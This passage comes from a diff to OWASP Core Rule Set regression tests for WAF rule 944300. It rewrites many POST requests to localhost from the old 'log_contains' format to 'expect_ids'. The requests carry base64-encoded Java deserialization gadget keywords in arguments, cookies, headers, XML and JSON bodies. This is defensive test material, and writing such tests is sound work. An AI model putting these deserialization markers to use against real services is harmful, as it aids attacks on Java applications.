\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-286 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}" + output: + log: + expect_ids: [944300] + - test_id: 286 desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-287 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 287 desc: "Argument test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-288 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 288 desc: "Argument name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-289 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test" + output: + log: + expect_ids: [944300] + - test_id: 289 desc: "Cookie test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - 
dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-290 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 290 desc: "Cookie name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-291 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 291 desc: "Request header test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-292 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 292 desc: "XML attribute value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-293 + - input: + dest_addr: "127.0.0.1" + port: 80 
+ headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 293 desc: "XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-294 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 294 desc: "Nested XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: 
"HTTP/1.0" - data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-295 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 295 desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-296 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 296 desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-297 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\"}" + output: + log: + expect_ids: [944300] + - test_id: 297 desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-298 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\": 
\"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 298 desc: "Argument test includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-299 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=d2hpbGVjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 299 desc: "Argument name includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "d2hpbGVjbG9zdXJl=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-300 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl=test" + output: + log: + expect_ids: [944300] + - test_id: 300 desc: "Cookie test includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=d2hpbGVjbG9zdXJl - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-301 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=d2hpbGVjbG9zdXJl + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 301 desc: "Cookie name includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: d2hpbGVjbG9zdXJl=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-302 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS 
test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: d2hpbGVjbG9zdXJl=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 302 desc: "Request header test includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: d2hpbGVjbG9zdXJl - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-303 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: d2hpbGVjbG9zdXJl + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 303 desc: "XML attribute value includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id 
\"944300\"" - - test_title: 944300-304 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 304 desc: "XML element value includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-305 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 305 desc: "Nested XML element value includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: 
"HTTP/1.0" - data: "d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-306 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 306 desc: "Content-Type text/plain includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-307 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=d2hpbGVjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 307 desc: "Content-Type application/json arg value includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"d2hpbGVjbG9zdXJl\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-308 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"d2hpbGVjbG9zdXJl\"}" + output: + log: + expect_ids: [944300] + - test_id: 308 desc: "Content-Type application/json arg name includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"d2hpbGVjbG9zdXJl\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-309 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"d2hpbGVjbG9zdXJl\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 309 desc: "Argument test includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-310 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HdoaWxlY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 310 desc: "Argument name includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HdoaWxlY2xvc3VyZQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-311 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ=test" + output: + log: + expect_ids: [944300] + - test_id: 311 desc: 